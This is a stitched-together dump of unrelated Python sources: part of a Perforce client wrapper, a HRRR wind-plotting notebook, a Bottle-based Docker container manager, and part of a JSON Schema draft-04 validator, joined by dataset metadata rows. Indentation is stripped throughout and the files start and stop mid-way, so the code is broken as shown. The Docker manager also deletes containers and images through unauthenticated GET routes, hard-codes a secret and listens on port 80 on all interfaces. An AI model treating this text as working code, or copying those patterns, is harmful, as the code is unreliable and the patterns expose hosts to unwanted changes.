return int(self._p4dict['fileSize'])
def __unicode__(self):
return self.depotFile
def __repr__(self):
return '<%s: %s#%s>' % (self.__class__.__name__, self.depotFile, self.revision)
def __int__(self):
return self.revision
def query(self):
"""Runs an fstat for this file and repopulates the data"""
self._p4dict = self._connection.run(['fstat', '-m', '1', self._p4dict['depotFile']])[0]
self._head = HeadRevision(self._p4dict)
self._filename = self.depotFile
def edit(self, changelist=0):
"""Checks out the file
:param changelist: Optional changelist to checkout the file into
:type changelist: :class:`.Changelist`
"""
command = 'reopen' if self.action in ('add', 'edit') else 'edit'
if int(changelist):
self._connection.run([command, '-c', str(changelist.change), self.depotFile])
else:
self._connection.run([command, self.depotFile])
self.query()
def lock(self, lock=True, changelist=0):
"""Locks or unlocks the file
:param lock: Lock or unlock the file
:type lock: bool
:param changelist: Optional changelist to checkout the file into
:type changelist: :class:`.Changelist`
"""
cmd = 'lock' if lock else 'unlock'
if changelist:
self._connection.run([cmd, '-c', changelist, self.depotFile])
else:
self._connection.run([cmd, self.depotFile])
self.query()
def sync(self, force=False, safe=True, revision=0, changelist=0):
"""Syncs the file at the current revision
:param force: Force the file to sync
:type force: bool
:param safe: Don't sync files that were changed outside perforce
:type safe: bool
:param revision: Sync to a specific revision
:type revision: int
:param changelist: Changelist to sync to
:type changelist: int
"""
cmd = ['sync']
if force:
cmd.append('-f')
if safe:
cmd.append('-s')
if revision:
cmd.append('{}#{}'.format(self.depotFile, revision))
elif changelist:
cmd.append('{}@{}'.format(self.depotFile, changelist))
else:
cmd.append(self.depotFile)
self._connection.run(cmd)
self.query()
def revert(self, unchanged=False):
"""Reverts any file changes
:param unchanged: Only revert if the file is unchanged
:type unchanged: bool
"""
cmd = ['revert']
if unchanged:
cmd.append('-a')
wasadd = self.action == 'add'
cmd.append(self.depotFile)
self._connection.run(cmd)
if 'movedFile' in self._p4dict:
self._p4dict['depotFile'] = self._p4dict['movedFile']
if not wasadd:
self.query()
if self._changelist:
self._changelist.remove(self, permanent=True)
def shelve(self, changelist=None):
"""Shelves the file if it is in a changelist
:param changelist: Changelist to add the move to
:type changelist: :class:`.Changelist`
"""
if changelist is None and self.changelist.description == 'default':
raise errors.ShelveError('Unabled to shelve files in the default changelist')
cmd = ['shelve']
if changelist:
cmd += ['-c', str(changelist)]
cmd.append(self.depotFile)
self._connection.run(cmd)
self.query()
def move(self, dest, changelist=0, force=False):
"""Renames/moves the file to dest
:param dest: Destination to move the file to
:type dest: str
:param changelist: Changelist to add the move to
:type changelist: :class:`.Changelist`
:param force: Force the move to an existing file
:type force: bool
"""
cmd = ['move']
if force:
cmd.append('-f')
if changelist:
cmd += ['-c', str(changelist)]
if not self.isEdit:
self.edit(changelist)
cmd += [self.depotFile, dest]
self._connection.run(cmd)
self._p4dict['depotFile'] = dest
self.query()
def delete(self, changelist=0):
"""Marks the file for delete
:param changelist: Changelist to add the move to
:type changelist: :class:`.Changelist`
"""
cmd = ['delete']
if changelist:
cmd += ['-c', str(changelist)]
cmd.append(self.depotFile)
self._connection.run(cmd)
self.query()
@property
def hash(self):
"""The hash value of the current revision"""
if 'digest' not in self._p4dict:
self._p4dict = self._connection.run(['fstat', '-m', '1', '-Ol', self.depotFile])[0]
return self._p4dict['digest']
@property
def clientFile(self):
"""The local path to the revision"""
return path.path(self._p4dict['clientFile'])
@property
def depotFile(self):
"""The depot path to the revision"""
return path.path(self._p4dict['depotFile'])
@property
def isMapped(self):
"""Is the file mapped to the current workspace"""
return 'isMapped' in self._p4dict
@property
def isShelved(self):
"""Is the file shelved"""
return 'shelved' in self._p4dict
@property
def revision(self):
"""Revision number"""
rev = self._p4dict.get('haveRev', -1)
if rev == 'none':
rev = 0
return int(rev)
@property
def description(self):
return self._p4dict.get('desc')
@property
def action(self):
"""The current action: add, edit, etc."""
return self._p4dict.get('action')
@property
def changelist(self):
"""Which :class:`.Changelist` is this revision in"""
if self._changelist:
return self._changelist
if self._p4dict['change'] == 'default':
return Default(connection=self._connection)
else:
return Changelist(str(self._p4dict['change']), self._connection)
@changelist.setter
def changelist(self, value):
if not isinstance(value, Changelist):
raise TypeError('argument needs to be an instance of Changelist')
if self not in value:
value.append(self)
self._changelist = value
@property
def type(self):
"""Best guess at file type. text or binary"""
if self.action == 'edit':
return self._p4dict['type']
return None
@property
def isResolved(self):
"""Is the revision resolved"""
return self.unresolved == 0
@property
def resolved(self):
"""The number, if any, of resolved integration records"""
return int(self._p4dict.get('resolved', 0))
@property
def unresolved(self):
"""The number, if any, of unresolved integration records"""
return int(self._p4dict.get('unresolved', 0))
@property
def openedBy(self):
"""Who has this file open for edit"""
return self._p4dict.get('otherOpen', [])
@property
def lockedBy(self):
"""Who has this file locked"""
return self._p4dict.get('otherLock', [])
@property
def isLocked(self):
"""Is the file locked by anyone excluding the current user"""
return 'ourLock' in self._p4dict or 'otherLock' in self._p4dict
@property
def head(self):
"""The :class:`.HeadRevision` of this file"""
return self._head
@property
def isSynced(self):
"""Is the local file the latest revision"""
return self.revision == self.head.revision
@property
def isEdit(self):
"""Is the file open for edit"""
return self.action == 'edit'
class HeadRevision(object):
"""The HeadRevision represents the latest version on the Perforce server"""
def __init__(self, filedict):
self._p4dict = filedict
@property
def action(self):
return self._p4dict['headAction']
@property
def change(self):
return int(self._p4dict['headChange']) if self._p4dict['headChange'] else 0
@property
def revision(self):
return int(self._p4dict['headRev'])
@property
def type(self):
return self._p4dict['headType']
@property
def time(self):
return datetime.datetime.fromtimestamp(int(self._p4dict['headTime']))
@property
def modifiedTime(self):
return datetime.datetime.fromtimestamp(int(self._p4dict['headModTime']))
class Client(FormObject):
"""Represents a client(workspace) for a given connection"""
COMMAND = 'client'
def __init__(self, client, connection=None):
super(Client, self).__init__(connection=connection)
assert client is not None
results = self._connection.run(['client', '-o', client])[0]
self._p4dict = {camel_case(k): v for k, v in six.iteritems(results)}
def __unicode__(self):
return self.client
@property
def root(self):
"""Root path fo the client"""
return path.Path(self._p4dict['root'])
@property
def client(self):
return self._p4dict['client']
@property
def description(self):
return self._p4dict['description'].strip()
@description.setter
def description(self, value):
self._p4dict['description'] = value.strip()
self._dirty = True
@property
def host(self):
return self._p4dict['host']
@host.setter
def host(self, value):
self._p4dict['host'] = value
self._dirty = True
@property
def lineEnd(self):
return self._p4dict['lineEnd']
@lineEnd.setter
def lineEnd(self, value):
self._p4dict['lineEnd'] = value
self._dirty = True
@property
def owner(self):
return self._p4dict['owner']
@owner.setter
def owner(self, value):
self._p4dict['owner'] = value
self._dirty = True
@property
def submitOptions(self):
return self._p4dict['submitOptions']
@submitOptions.setter
def submitOptions(self, value):
self._p4dict['submitOptions'] = value
self._dirty = True
@property
def view(self):
"""A list of view specs"""
spec = []
for k, v in six.iteritems(self._p4dict):
if k.startswith('view'):
match = RE_FILESPEC.search(v)
if match:
spec.append(FileSpec(v[:match.end() - 1], v[match.end():]))
return spec
@property
def access(self):
"""The date and time last accessed"""
return datetime.datetime.strptime(self._p4dict['access'], DATE_FORMAT)
@property
def update(self):
"""The date and time the client was updated"""
return datetime.datetime.strptime(self._p4dict['update'], DATE_FORMAT)
@property
def stream(self):
"""Which stream, if any, the client is under"""
stream = self._p4dict.get('stream')
if stream:
return Stream(stream, self._connection)
class Stream(PerforceObject):
"""An object representing a perforce stream"""
def __init__(self, stream, connection=None):
super(Stream, self).__init__(connection=connection)
assert stream is not None
results = self._connection.run(['stream', '-o', '-v', stream])[0]
self._p4dict = {camel_case(k): v for k, v in six.iteritems(results)}
def __unicode__(self):
return self._p4dict['stream']
@property
def description(self):
"""Stream description tha thas been trimmed"""
return self._p4dict.get('description', '').strip()
@property
def view(self):
"""A list of view specs"""
spec = []
for k, v in six.iteritems(self._p4dict):
if k.startswith('view'):
match = RE_FILESPEC.search(v)
if match:
spec.append(FileSpec(v[:match.end() - 1], v[match.end():]))
return spec
@property
def access(self):
"""The date and time last accessed"""
return datetime.datetime.strptime(self._p4dict['access'], DATE_FORMAT)
@property
def update(self):
"""The date and time the client was updated"""
return datetime.datetime.strptime(self._p4dict['update'], DATE_FORMAT)
| mit | -9,058,517,573,385,367,000 | 28.361386 | 154 | 0.563199 | false |
rsignell-usgs/notebook | Siphon/hrrr_wind.py | 1 | 2948 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import matplotlib.pyplot as plt
import numpy as np
%matplotlib inline
# <headingcell level=2>
# Extract HRRR data using Unidata's Siphon package
# <codecell>
# Resolve the latest HRRR dataset
from siphon.catalog import TDSCatalog
latest_hrrr = TDSCatalog('http://thredds-jumbo.unidata.ucar.edu/thredds/catalog/grib/HRRR/CONUS_3km/surface/latest.xml')
hrrr_ds = list(latest_hrrr.datasets.values())[0]
# Set up access via NCSS
from siphon.ncss import NCSS
ncss = NCSS(hrrr_ds.access_urls['NetcdfSubset'])
# Create a query to ask for all times in netcdf4 format for
# the Temperature_surface variable, with a bounding box
query = ncss.query()
# <codecell>
dap_url = hrrr_ds.access_urls['OPENDAP']
# <codecell>
query.all_times().accept('netcdf4').variables('u-component_of_wind_height_above_ground',
'v-component_of_wind_height_above_ground')
query.lonlat_box(45, 41., -63, -71.5)
# Get the raw bytes and write to a file.
data = ncss.get_data_raw(query)
with open('test_uv.nc', 'wb') as outf:
outf.write(data)
# <headingcell level=2>
# Try reading extracted data with Xray
# <codecell>
import xray
# <codecell>
nc = xray.open_dataset('test_uv.nc')
# <codecell>
nc
# <codecell>
uvar_name='u-component_of_wind_height_above_ground'
vvar_name='v-component_of_wind_height_above_ground'
uvar = nc[uvar_name]
vvar = nc[vvar_name]
# <codecell>
uvar
# <codecell>
grid = nc[uvar.grid_mapping]
grid
# <codecell>
lon0 = grid.longitude_of_central_meridian
lat0 = grid.latitude_of_projection_origin
lat1 = grid.standard_parallel
earth_radius = grid.earth_radius
# <headingcell level=2>
# Try plotting the LambertConformal data with Cartopy
# <codecell>
import cartopy
import cartopy.crs as ccrs
# <codecell>
#cartopy wants meters, not km
x = uvar.x.data*1000.
y = uvar.y.data*1000.
# <codecell>
# <codecell>
#globe = ccrs.Globe(ellipse='WGS84') #default
globe = ccrs.Globe(ellipse='sphere', semimajor_axis=grid.earth_radius)
crs = ccrs.LambertConformal(central_longitude=lon0, central_latitude=lat0,
standard_parallels=(lat0,lat1), globe=globe)
# <codecell>
print(uvar.x.data.shape)
print(uvar.y.data.shape)
print(uvar.data.shape)
# <codecell>
uvar[6,:,:].time1.data
# <codecell>
istep =6
klev = 0
u = uvar[istep,klev,:,:].data
v = vvar[istep,klev,:,:].data
spd = np.sqrt(u*u+v*v)
# <codecell>
fig = plt.figure(figsize=(10,16))
ax = plt.axes(projection=ccrs.PlateCarree())
c = ax.pcolormesh(x,y,spd, transform=crs,zorder=0)
cb = fig.colorbar(c,orientation='vertical',shrink=0.5)
cb.set_label('m/s')
ax.coastlines(resolution='10m',color='black',zorder=1)
ax.quiver(x,y,u,v,transform=crs,zorder=2,scale=100)
gl = ax.gridlines(draw_labels=True)
gl.xlabels_top = False
gl.ylabels_right = False
plt.title(uvar[istep].time1.data);
plt.axis([-72,-69.8,40.6, 43.5]);
# <codecell>
| mit | -7,181,985,171,809,236,000 | 19.472222 | 120 | 0.698779 | false |
Kostanos/domg | app.py | 1 | 9634 | #!/usr/bin/env python
# coding=utf-8
"""
The manager
"""
import json
import os
import re
from time import strptime, mktime
import bottle
from datetime import datetime
from docker import Client
from docker.errors import APIError
from hostmanager import HOSTS_PATH
from lib import FlashMsgPlugin, Hosts, group_containers_by_name, human
STATIC = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')
docker = Client()
app = bottle.default_app()
bottle.SimpleTemplate.defaults = {'app': app}
bottle.TEMPLATE_PATH.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'views'))
PORTS_AND_ICONS = {
'default': 'glyphicon-minus white',
'4200': "glyphicon-console",
'3306': "glyphicon-oil",
'8080': "glyphicon-globe",
'80': "glyphicon-globe",
'443': "glyphicon-globe",
}
def generate_menu():
items = [
('Containers', '/'),
('Images', '/images'),
('Hosts', '/hosts'),
]
current_route = bottle.request.route
menu = []
for item in items:
label, url = item
try:
irt, args = bottle.default_app().match({'PATH_INFO': url, 'REQUEST_METHOD': bottle.request.method})
except bottle.HTTPError:
irt = None
active = ' class="active"' if irt and current_route.name == irt.name else ''
menu.append('<li%s><a href="%s">%s</a></li>' % (active, url, label))
return " ".join(menu)
@bottle.route('/', name="index", method="GET")
def index():
running = docker.containers(quiet=True, all=True)
container_list = []
for con in running:
container_info = docker.inspect_container(con['Id'])
container_list.append(container_info)
running_containers = [container for container in container_list if container['State']['Running'] is True]
human_containers = [container for container in container_list if
container['State']['Running'] is False
and len(re.findall(r"^[a-f\d]{64}$|^[A-F\d]{64}$", container['Config']['Image'])) == 0]
computer_containers = [container for container in container_list if
container['State']['Running'] is False
and len(re.findall(r"^[a-f\d]{64}$|^[A-F\d]{64}$", container['Config']['Image'])) == 1]
# Sort by name
running_containers, human_containers, computer_containers = \
sorted(running_containers, key=lambda x: x['Name']), \
sorted(human_containers, key=lambda x: x['Name']), \
sorted(computer_containers, key=lambda x: x['Name'])
# Then by last used
running_containers, human_containers, computer_containers = \
sorted(running_containers, key=lambda x: x['State']['StartedAt'], reverse=True), \
sorted(human_containers, key=lambda x: x['State']['StartedAt'], reverse=True), \
sorted(computer_containers, key=lambda x: x['State']['StartedAt'], reverse=True)
hostname = bottle.request.get_header('Host', 'localhost').split(':')[0]
running_containers = group_containers_by_name(running_containers)
human_containers = group_containers_by_name(human_containers)
computer_containers = group_containers_by_name(computer_containers)
return bottle.template('index.html',
title="DoMG",
menu=generate_menu(),
hosts=Hosts(HOSTS_PATH).get_reversed(),
running_containers=running_containers,
human_containers=human_containers,
computer_containers=computer_containers,
hostname=hostname)
@bottle.route('/details/<container_id>', name="details", method="GET")
def container_details(container_id):
details = docker.inspect_container(container_id)
started_at = datetime.fromtimestamp(
mktime(strptime(details['State']['StartedAt'].split('.')[0], "%Y-%m-%dT%H:%M:%S")))
raw_finished_at = details['State']['FinishedAt'].split('.')
if len(raw_finished_at) == 2:
raw_finished_at = raw_finished_at[0]
else:
raw_finished_at = '0001-01-01T00:00:00'
finished_at = datetime.fromtimestamp(
mktime(strptime(raw_finished_at, "%Y-%m-%dT%H:%M:%S")))
details['State']['StartedAt'] = human(started_at, past_tense='{}', future_tense='{}')
details['State']['FinishedAt'] = human(finished_at)
details['State']['UpFor'] = human(finished_at - started_at, past_tense='{}', future_tense='{}')
details['State']['UpFor'] = details['State']['UpFor'] if details['State']['UpFor'] else 'less than a second'
return bottle.template('details.html',
title="DoMG",
menu=generate_menu(),
details=details)
@bottle.route('/images', name="images", method="GET")
def list_images():
images = docker.images()
image_details = [{'tags': img['RepoTags'], 'inspect': docker.inspect_image(img['Id'])} for img in images]
return bottle.template('images.html', title="Images | DoMG", menu=generate_menu(), images=image_details)
@bottle.route('/deleteimage/<image_id>', name="image_delete", method="GET")
def image_delete(image_id):
try:
docker.remove_image(image_id)
app.flash('Deleted image <em>%s</em>!' % image_id)
except APIError as e:
app.flash(e.explanation, 'danger')
return bottle.redirect(bottle.request.headers.get('Referer', '/images').strip())
@bottle.route('/logs/<container_id>', name="logs", method="GET")
def logs(container_id):
log = docker.logs(container_id)
if bottle.request.headers.get('X-Requested-With') == 'XMLHttpRequest':
return '<pre>%s</pre>' % log
return bottle.template('logs.html', title="Logs | DoMG", menu=generate_menu(), log=log)
@bottle.route('/delete/<container_id>', name="delete", method="GET")
def container_delete(container_id):
try:
docker.remove_container(container_id)
app.flash('Deleted container <em>%s</em>!' % container_id)
except APIError as e:
app.flash(e.explanation, 'danger')
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/stop/<container_id>', name="stop", method="GET")
def container_stop(container_id):
try:
docker.stop(container_id)
except APIError as e:
bottle.response.content_type = 'application/json'
return json.dumps({
'error': e.explanation
})
if bottle.request.headers.get('X-Requested-With') == 'XMLHttpRequest':
bottle.response.content_type = 'application/json'
return json.dumps({
'href': '/start/%s' % container_id,
'icon': 'glyphicon-play green'
})
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/start/<container_id>', name="start", method="GET")
def container_start(container_id):
try:
docker.start(container_id)
except APIError as e:
bottle.response.content_type = 'application/json'
return json.dumps({
'error': e.explanation
})
if bottle.request.headers.get('X-Requested-With') == 'XMLHttpRequest':
bottle.response.content_type = 'application/json'
return json.dumps({
'href': '/stop/%s' % container_id,
'icon': 'glyphicon-stop red'
})
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/static/<path:path>')
def callback(path):
return bottle.static_file(path, STATIC)
@bottle.route('/hosts', name="hosts", method="GET")
def list_hosts():
hosts = Hosts(HOSTS_PATH)
running_containers = [docker.inspect_container(container['Id']) for container in docker.containers(quiet=True)]
ip_list = [info['NetworkSettings']['IPAddress'] for info in running_containers if
'IPAddress' in info['NetworkSettings']]
return bottle.template('hosts.html',
title="Hosts | DoMG",
menu=generate_menu(),
hosts=hosts,
active_ip_list=ip_list,
begins_with='172.17.0.')
@bottle.route('/delete-host/<hostname>', name="delete_host", method="GET")
def delete_host(hostname):
hosts = Hosts(HOSTS_PATH)
hosts.remove_one(hostname)
hosts.write(HOSTS_PATH)
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/delete-inactive-hosts', name="delete_inactive_hosts", method="GET")
def delete_inactive_hosts():
running_containers = [docker.inspect_container(container['Id']) for container in docker.containers(quiet=True)]
active_ip_list = [info['NetworkSettings']['IPAddress'] for info in running_containers if
'IPAddress' in info['NetworkSettings']]
hosts = Hosts(HOSTS_PATH)
reversed_list = hosts.get_reversed()
for ip in reversed_list:
if ip[0:9] == '172.17.0.' and ip not in active_ip_list:
hosts.remove_all(reversed_list[ip])
hosts.write(HOSTS_PATH)
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/test')
def test():
hosts_contents = docker.execute('rebagg_mysql_1', 'cat /etc/hosts')
return hosts_contents
if __name__ == '__main__':
import socket
my_ip = socket.gethostbyname(socket.gethostname())
# print("Go to http://" + my_ip + "/")
print("Hit Ctrl+C to stop")
app.install(FlashMsgPlugin(secret='somethingelse'))
bottle.run(host='0.0.0.0', port=80, quiet=True)
| mit | -496,082,090,395,185,600 | 37.38247 | 115 | 0.618642 | false |
johnnoone/json-spec | src/jsonspec/validators/draft04.py | 1 | 26115 | """
jsonspec.validators.draft04
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements JSON Schema draft04.
"""
from __future__ import absolute_import
import logging
import re
from copy import deepcopy
from decimal import Decimal
from six import integer_types, string_types
from six.moves.urllib.parse import urljoin
from .bases import ReferenceValidator, Validator
from .exceptions import CompilationError
from .factorize import register
from jsonspec.validators.exceptions import ValidationError
from jsonspec.validators.util import uncamel
from jsonspec.validators.pointer_util import pointer_join
from jsonspec import driver as json
__all__ = ['compile', 'Draft04Validator']
sequence_types = (list, set, tuple)
number_types = (integer_types, float, Decimal)
logger = logging.getLogger(__name__)
@register(spec='http://json-schema.org/draft-04/schema#')
def compile(schema, pointer, context, scope=None):
"""
Compiles schema with `JSON Schema`_ draft-04.
:param schema: obj to compile
:type schema: Mapping
:param pointer: uri of the schema
:type pointer: Pointer, str
:param context: context of this schema
:type context: Context
.. _`JSON Schema`: http://json-schema.org
"""
schm = deepcopy(schema)
scope = urljoin(scope or str(pointer), schm.pop('id', None))
if '$ref' in schema:
return ReferenceValidator(urljoin(scope, schema['$ref']), context)
attrs = {}
if 'additionalItems' in schm:
subpointer = pointer_join(pointer, 'additionalItems')
attrs['additional_items'] = schm.pop('additionalItems')
if isinstance(attrs['additional_items'], dict):
compiled = compile(attrs['additional_items'],
subpointer,
context,
scope)
attrs['additional_items'] = compiled
elif not isinstance(attrs['additional_items'], bool):
raise CompilationError('wrong type for {}'.format('additional_items'), schema) # noqa
if 'additionalProperties' in schm:
subpointer = pointer_join(pointer, 'additionalProperties')
attrs['additional_properties'] = schm.pop('additionalProperties')
if isinstance(attrs['additional_properties'], dict):
compiled = compile(attrs['additional_properties'],
subpointer,
context,
scope)
attrs['additional_properties'] = compiled
elif not isinstance(attrs['additional_properties'], bool):
raise CompilationError('wrong type for {}'.format('additional_properties'), schema) # noqa
if 'allOf' in schm:
subpointer = pointer_join(pointer, 'allOf')
attrs['all_of'] = schm.pop('allOf')
if isinstance(attrs['all_of'], (list, tuple)):
attrs['all_of'] = [compile(element, subpointer, context, scope) for element in attrs['all_of']] # noqa
else:
# should be a boolean
raise CompilationError('wrong type for {}'.format('allOf'), schema) # noqa
if 'anyOf' in schm:
subpointer = pointer_join(pointer, 'anyOf')
attrs['any_of'] = schm.pop('anyOf')
if isinstance(attrs['any_of'], (list, tuple)):
attrs['any_of'] = [compile(element, subpointer, context, scope) for element in attrs['any_of']] # noqa
else:
# should be a boolean
raise CompilationError('wrong type for {}'.format('anyOf'), schema) # noqa
if 'default' in schm:
attrs['default'] = schm.pop('default')
if 'dependencies' in schm:
attrs['dependencies'] = schm.pop('dependencies')
if not isinstance(attrs['dependencies'], dict):
raise CompilationError('dependencies must be an object', schema)
for key, value in attrs['dependencies'].items():
if isinstance(value, dict):
subpointer = pointer_join(pointer, 'dependencies', key)
attrs['dependencies'][key] = compile(value,
subpointer,
context,
scope)
elif not isinstance(value, sequence_types):
raise CompilationError('dependencies must be an array or object', schema) # noqa
if 'enum' in schm:
attrs['enum'] = schm.pop('enum')
if not isinstance(attrs['enum'], sequence_types):
raise CompilationError('enum must be a sequence', schema)
if 'exclusiveMaximum' in schm:
attrs['exclusive_maximum'] = schm.pop('exclusiveMaximum')
if not isinstance(attrs['exclusive_maximum'], bool):
raise CompilationError('exclusiveMaximum must be a boolean', schema) # noqa
if 'exclusiveMinimum' in schm:
attrs['exclusive_minimum'] = schm.pop('exclusiveMinimum')
if not isinstance(attrs['exclusive_minimum'], bool):
raise CompilationError('exclusiveMinimum must be a boolean', schema) # noqa
if 'format' in schm:
attrs['format'] = schm.pop('format')
if not isinstance(attrs['format'], string_types):
raise CompilationError('format must be a string', schema)
if 'items' in schm:
subpointer = pointer_join(pointer, 'items')
attrs['items'] = schm.pop('items')
if isinstance(attrs['items'], (list, tuple)):
# each value must be a json schema
attrs['items'] = [compile(element, subpointer, context, scope) for element in attrs['items']] # noqa
elif isinstance(attrs['items'], dict):
# value must be a json schema
attrs['items'] = compile(attrs['items'], subpointer, context, scope) # noqa
else:
# should be a boolean
raise CompilationError('wrong type for {}'.format('items'), schema) # noqa
if 'maximum' in schm:
attrs['maximum'] = schm.pop('maximum')
if not isinstance(attrs['maximum'], number_types):
raise CompilationError('maximum must be a number', schema)
if 'maxItems' in schm:
attrs['max_items'] = schm.pop('maxItems')
if not isinstance(attrs['max_items'], integer_types):
raise CompilationError('maxItems must be integer', schema)
if 'maxLength' in schm:
attrs['max_length'] = schm.pop('maxLength')
if not isinstance(attrs['max_length'], integer_types):
raise CompilationError('maxLength must be integer', schema)
if 'maxProperties' in schm:
attrs['max_properties'] = schm.pop('maxProperties')
if not isinstance(attrs['max_properties'], integer_types):
raise CompilationError('maxProperties must be integer', schema)
if 'minimum' in schm:
attrs['minimum'] = schm.pop('minimum')
if not isinstance(attrs['minimum'], number_types):
raise CompilationError('minimum must be a number', schema)
if 'minItems' in schm:
attrs['min_items'] = schm.pop('minItems')
if not isinstance(attrs['min_items'], integer_types):
raise CompilationError('minItems must be integer', schema)
if 'minLength' in schm:
attrs['min_length'] = schm.pop('minLength')
if not isinstance(attrs['min_length'], integer_types):
raise CompilationError('minLength must be integer', schema)
if 'minProperties' in schm:
attrs['min_properties'] = schm.pop('minProperties')
if not isinstance(attrs['min_properties'], integer_types):
raise CompilationError('minProperties must be integer', schema)
if 'multipleOf' in schm:
attrs['multiple_of'] = schm.pop('multipleOf')
if not isinstance(attrs['multiple_of'], number_types):
raise CompilationError('multipleOf must be a number', schema)
if 'not' in schm:
attrs['not'] = schm.pop('not')
if not isinstance(attrs['not'], dict):
raise CompilationError('not must be an object', schema)
subpointer = pointer_join(pointer, 'not')
attrs['not'] = compile(attrs['not'], subpointer, context, scope)
if 'oneOf' in schm:
subpointer = pointer_join(pointer, 'oneOf')
attrs['one_of'] = schm.pop('oneOf')
if isinstance(attrs['one_of'], (list, tuple)):
# each value must be a json schema
attrs['one_of'] = [compile(element, subpointer, context, scope) for element in attrs['one_of']] # noqa
else:
# should be a boolean
raise CompilationError('wrong type for {}'.format('oneOf'), schema)
if 'pattern' in schm:
attrs['pattern'] = schm.pop('pattern')
if not isinstance(attrs['pattern'], string_types):
raise CompilationError('pattern must be a string', schema)
if 'properties' in schm:
attrs['properties'] = schm.pop('properties')
if not isinstance(attrs['properties'], dict):
raise CompilationError('properties must be an object', schema)
for subname, subschema in attrs['properties'].items():
subpointer = pointer_join(pointer, subname)
compiled = compile(subschema, subpointer, context, scope)
attrs['properties'][subname] = compiled
if 'patternProperties' in schm:
attrs['pattern_properties'] = schm.pop('patternProperties')
if not isinstance(attrs['pattern_properties'], dict):
raise CompilationError('patternProperties must be an object', schema) # noqa
for subname, subschema in attrs['pattern_properties'].items():
subpointer = pointer_join(pointer, 'patternProperties', subname)
compiled = compile(subschema, subpointer, context, scope)
attrs['pattern_properties'][subname] = compiled
if 'required' in schm:
attrs['required'] = schm.pop('required')
if not isinstance(attrs['required'], list):
raise CompilationError('required must be a list', schema)
if len(attrs['required']) < 1:
raise CompilationError('required cannot be empty', schema)
if 'type' in schm:
attrs['type'] = schm.pop('type')
if isinstance(attrs['type'], string_types):
attrs['type'] = [attrs['type']]
elif not isinstance(attrs['type'], sequence_types):
raise CompilationError('type must be string or sequence', schema)
if 'uniqueItems' in schm:
attrs['unique_items'] = schm.pop('uniqueItems')
if not isinstance(attrs['unique_items'], bool):
raise CompilationError('type must be boolean', schema)
return Draft04Validator(attrs, str(pointer), context.formats)
class Draft04Validator(Validator):
"""
Implements `JSON Schema`_ draft-04 validation.
:ivar attrs: attributes to validate against
:ivar uri: uri of the current validator
:ivar formats: mapping of available formats
>>> validator = Draft04Validator({'min_length': 4})
>>> assert validator('this is sparta')
.. _`JSON Schema`: http://json-schema.org
"""
def __init__(self, attrs, uri=None, formats=None):
attrs = {uncamel(k): v for k, v in attrs.items()}
self.formats = formats or {}
self.attrs = attrs
self.attrs.setdefault('additional_items', True)
self.attrs.setdefault('additional_properties', True)
self.attrs.setdefault('exclusive_maximum', False),
self.attrs.setdefault('exclusive_minimum', False),
self.attrs.setdefault('pattern_properties', {})
self.attrs.setdefault('properties', {})
self.uri = uri
self.default = self.attrs.get('default', None)
self.fail_fast = True
self.errors = []
def validate(self, obj, pointer=None):
"""
Validate object against validator
:param obj: the object to validate
"""
pointer = pointer or '#'
validator = deepcopy(self)
validator.errors = []
validator.fail_fast = False
obj = deepcopy(obj)
obj = validator.validate_enum(obj, pointer)
obj = validator.validate_type(obj, pointer)
obj = validator.validate_not(obj, pointer)
obj = validator.validate_all_of(obj, pointer)
obj = validator.validate_any_of(obj, pointer)
obj = validator.validate_one_of(obj, pointer)
if self.is_array(obj):
obj = validator.validate_items(obj, pointer)
obj = validator.validate_max_items(obj, pointer)
obj = validator.validate_min_items(obj, pointer)
obj = validator.validate_unique_items(obj, pointer)
elif self.is_number(obj):
obj = validator.validate_maximum(obj, pointer)
obj = validator.validate_minimum(obj, pointer)
obj = validator.validate_multiple_of(obj, pointer)
elif self.is_object(obj):
obj = validator.validate_required(obj, pointer)
obj = validator.validate_max_properties(obj, pointer)
obj = validator.validate_min_properties(obj, pointer)
obj = validator.validate_dependencies(obj, pointer)
obj = validator.validate_properties(obj, pointer)
obj = validator.validate_default_properties(obj, pointer)
elif self.is_string(obj):
obj = validator.validate_max_length(obj, pointer)
obj = validator.validate_min_length(obj, pointer)
obj = validator.validate_pattern(obj, pointer)
obj = validator.validate_format(obj, pointer)
if validator.errors:
raise ValidationError('multiple errors',
obj,
errors=validator.errors)
return obj
def is_array(self, obj):
return isinstance(obj, sequence_types)
def is_boolean(self, obj):
return isinstance(obj, bool)
def is_integer(self, obj):
return isinstance(obj, integer_types) and not isinstance(obj, bool)
def is_number(self, obj):
return isinstance(obj, number_types) and not isinstance(obj, bool)
def is_object(self, obj):
return isinstance(obj, dict)
def is_string(self, obj):
return isinstance(obj, string_types)
def has_default(self):
return 'default' in self.attrs
def validate_all_of(self, obj, pointer=None):
for validator in self.attrs.get('all_of', []):
obj = validator(obj)
return obj
def validate_any_of(self, obj, pointer=None):
if 'any_of' in self.attrs:
for validator in self.attrs['any_of']:
try:
obj = validator(obj)
return obj
except ValidationError:
pass
self.fail('Not in any_of', obj, pointer)
return obj
def validate_default_properties(self, obj, pointer=None):
# Reinject defaults from properties.
for name, validator in self.attrs.get('properties', {}).items():
if name not in obj and validator.has_default():
obj[name] = deepcopy(validator.default)
return obj
def validate_dependencies(self, obj, pointer=None):
for key, dependencies in self.attrs.get('dependencies', {}).items():
if key in obj:
if isinstance(dependencies, sequence_types):
for name in set(dependencies) - set(obj.keys()):
self.fail('Missing property', obj, pointer_join(pointer, name)) # noqa
else:
dependencies(obj)
return obj
def validate_enum(self, obj, pointer=None):
if 'enum' in self.attrs:
if obj not in self.attrs['enum']:
self.fail('Forbidden value', obj, pointer)
return obj
def validate_format(self, obj, pointer=None):
"""
================= ============
Expected draft04 Alias of
----------------- ------------
date-time rfc3339.datetime
email email
hostname hostname
ipv4 ipv4
ipv6 ipv6
uri uri
================= ============
"""
if 'format' in self.attrs:
substituted = {
'date-time': 'rfc3339.datetime',
'email': 'email',
'hostname': 'hostname',
'ipv4': 'ipv4',
'ipv6': 'ipv6',
'uri': 'uri',
}.get(self.attrs['format'], self.attrs['format'])
